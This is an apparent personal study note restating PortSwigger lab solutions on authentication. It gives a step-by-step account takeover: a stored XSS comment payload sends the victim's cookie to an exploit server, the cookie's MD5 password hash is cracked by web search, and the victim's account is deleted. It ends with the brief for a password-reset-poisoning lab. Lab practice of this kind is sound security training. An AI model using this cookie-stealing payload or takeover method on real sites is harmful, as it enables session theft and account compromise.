TheWhiteFluid/Obsidian_Cyber/Obisdian_vault/WEB.PortSwigger/Authentication.md

 1. With Burp running, use your own account to investigate the "Stay logged in" functionality.
 Notice that the `stay-logged-in` cookie is Base64 encoded.
 2. In the **Proxy > HTTP history** tab, go to the **Response** to your login request and highlight the `stay-logged-in` cookie, to see that it is constructed as follows:
     `username+':'+md5HashOfPassword`

 3. You now need to steal the victim user's cookie.
 Observe that the comment functionality is vulnerable to XSS.
 4. Go to the exploit server and make a note of the URL.
 5. Go to one of the blogs and post a comment containing the following [stored XSS](https://portswigger.net/web-security/cross-site-scripting/stored) payload, remembering to enter your own exploit server ID:
     `<script>document.location='//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/'+document.cookie</script>`

 6. On the exploit server, open the access log.
 There should be a `GET` request from the victim containing their `stay-logged-in` cookie.
 7. Decode the cookie in Burp Decoder.
 The result will be:
     `carlos:26323c16d5f4dabff3bb136f2460a943`
 8. Copy the hash and paste it into a search engine.
 This will reveal that the password is `onceuponatime`.
-9. Log in to the victim's account, go to the "My account" page, and delete their account to solve the lab.

 # **10. Password reset poisoning via middleware**
 This lab is vulnerable to password reset poisoning.
 The user `carlos` will carelessly click on any links in emails that he receives.
 To solve the lab, log in to Carlos's account.
 You can log in to your own account using the following credentials: `wiener:peter`.
 Any emails sent to this account can be read via the email client on the exploit server.